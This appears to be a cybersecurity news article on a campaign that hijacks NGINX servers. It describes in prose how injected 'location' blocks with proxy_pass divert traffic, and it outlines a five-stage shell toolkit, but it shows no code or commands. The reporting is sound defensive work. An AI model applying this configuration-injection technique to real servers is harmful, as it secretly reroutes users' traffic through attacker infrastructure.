In a startling revelation, hackers are infiltrating NGINX servers, redirecting user traffic through their own infrastructure. This alarming trend raises significant concerns about cybersecurity and the integrity of web traffic management.
NGINX, an open-source platform designed for managing web traffic, plays a crucial role in facilitating connections between users and servers. Its capabilities include web serving, load balancing, caching, and functioning as a reverse proxy, which makes it a fundamental tool for many websites.
Recently, researchers at DataDog Security Labs uncovered a malicious campaign that specifically targets NGINX installations and Baota hosting management panels. This campaign has been particularly focused on sites operating under Asian top-level domains such as .in, .id, .pe, .bd, and .th, as well as educational and governmental sites denoted by the .edu and .gov extensions.
The attackers employ a devious tactic: they alter existing configurations within NGINX by injecting harmful ‘location’ blocks into configuration files. These blocks capture incoming requests directed at specific URL paths chosen by the attackers. After capturing these requests, the malicious code rewrites them to include the original URL in full, then forwards the traffic using the ‘proxy_pass’ directive to domains controlled by the attackers.
What’s particularly insidious about this method is that the ‘proxy_pass’ directive is typically used for legitimate purposes like load balancing, allowing NGINX to route requests through different backend server groups to enhance performance or reliability. Because this functionality is being exploited rather than compromised, it often goes unnoticed by security systems.
To further disguise the malicious activity, request headers such as ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’ remain intact, giving the appearance that the traffic is legitimate.
The attack employs a sophisticated multi-stage scripted toolkit to implement these NGINX configuration injections, which unfolds across five distinct stages:
- Stage 1 – zx.sh: This initial controller script downloads and activates the subsequent stages. It incorporates a fallback mechanism that sends raw HTTP requests directly over TCP if tools like curl or wget are unavailable.
- Stage 2 – bt.sh: This stage focuses on NGINX configuration files managed by the Baota panel. It selects injection templates based on the server_name value, securely overwrites the configurations, and reloads NGINX to minimize service interruptions.
- Stage 3 – 4zdh.sh: Here, the script identifies common locations for NGINX configuration files, such as sites-enabled, conf.d, and sites-available. It utilizes parsing tools such as csplit and awk to ensure configuration integrity, checks for existing injections through hashing and a global mapping file, and confirms changes using nginx -t before reloading.
- Stage 4 – zdh.sh: This stage narrows its focus primarily on /etc/nginx/sites-enabled, especially targeting domains with .in and .id extensions. The process mirrors that of the previous stage, employing the same testing and reloading methodology, with a forced restart (pkill) as a contingency measure.
- Stage 5 – ok.sh: In the final stage, the script scans compromised NGINX configurations to compile a map of hijacked domains, injection templates, and proxy targets. This gathered information is subsequently sent to a command-and-control (C2) server located at 158.94.210[.]227.
Detecting these attacks proves to be a challenging task. They do not capitalize on vulnerabilities within NGINX itself but instead conceal harmful instructions within its configuration files—files that are seldom subjected to thorough examination. Furthermore, because user traffic generally reaches its intended destination directly, the interception by the attacker’s infrastructure often goes unnoticed unless specific monitoring measures are in place.
As we look towards the future of IT infrastructure, understanding and addressing these types of cyber threats becomes increasingly critical.
In an ever-evolving digital landscape, modern IT infrastructure is advancing at a pace that manual workflows struggle to keep up with. For those interested in optimizing their operations, Tines offers a guide detailing how teams can eliminate hidden delays, enhance reliability through automated responses, and create scalable intelligent workflows utilizing existing tools.
What are your thoughts on the effectiveness of current cybersecurity measures against such sophisticated attacks? Do you believe organizations are doing enough to protect their NGINX servers? Let us know in the comments!
